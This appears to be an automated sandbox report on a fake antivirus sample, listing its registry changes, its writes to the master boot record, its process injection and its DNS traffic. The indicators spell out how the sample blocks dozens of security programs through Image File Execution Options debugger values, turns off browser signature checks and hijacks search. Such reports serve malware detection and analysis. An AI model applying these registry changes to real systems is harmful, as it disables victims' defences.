Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webtrap.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wyvernworksfirewall.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\au.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxdl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bidserver.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPck.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgctrl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netarmor.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winssk32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zatutor.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDInProcPatch.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto-protect.nav80try.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luspt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\start.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windll32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbcons.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcomx.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpro.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brastk.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfwsvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdsubwiz.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmain.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ozn695m5.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav7win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmon.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccapp.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgtray.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\c.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bd_professional.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perswf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxfw.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssmmc32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pgmonitr.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmesys.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mu0311ad.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\persfw.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxquar.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qserver.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sh.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npf40_tw_98_nt_me_2k.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmain.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\8b93e\\IS978.exe\" /s /d" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\ltHI = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IIL = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\ltTST = "15831" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FAKEAV~1\\INTERN~1.EXE" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "InternetSecurityGuard.DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
